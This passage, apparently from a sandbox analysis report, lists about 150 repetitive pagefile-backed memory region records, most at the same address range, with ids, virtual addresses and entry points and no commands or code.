	              id = 2924
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2925
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2926
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2927
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2928
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2929
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2930
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2931
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2932
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2933
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2934
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2935
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2936
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2937
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2938
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2939
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2940
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2941
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2942
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2943
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2944
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2945
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2946
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2947
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2948
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2949
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2950
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2951
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2952
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2953
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2954
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2955
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2956
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2957
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2958
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2959
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2960
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2961
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2962
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2963
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2964
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2965
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2966
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2967
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2968
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2969
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2970
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2971
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2972
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2973
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2974
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2975
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2976
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2977
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2978
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2979
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2980
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2981
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2982
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2983
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2984
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2985
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2986
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2987
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2988
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2989
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2990
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2991
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2992
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2993
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2994
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2995
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2996
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2997
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2998
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 2999
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3000
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3001
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3002
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3003
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3004
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3005
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3006
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3007
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3008
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3009
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3010
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3011
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3012
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3013
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3014
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3015
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3016
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3017
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3018
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3019
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3020
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3021
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3022
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3023
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3024
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3025
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3026
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3027
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3028
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3029
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3030
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3031
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3032
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3033
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3034
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3035
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3036
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3037
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3038
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3040
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3041
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3042
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3043
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3044
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3045
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3046
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3047
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3048
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3049
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3050
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3051
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3052
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3053
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3054
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3055
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3056
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3057
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3058
	        start_va = 0x4cb0000
	          end_va = 0x4cccfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3059
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3060
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3061
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3062
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3063
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3064
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3065
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3066
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3067
	        start_va = 0x4cb0000
	          end_va = 0x4cb8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3068
	        start_va = 0x6f70000
	          end_va = 0x776ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000006f70000"
	        filename = ""

Region:
	              id = 3069
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3070
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3071
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3072
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3073
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3074
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3075
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3076
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
	              id = 3077
	        start_va = 0x4cb0000
	          end_va = 0x4cb6fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004cb0000"
	        filename = ""

Region:
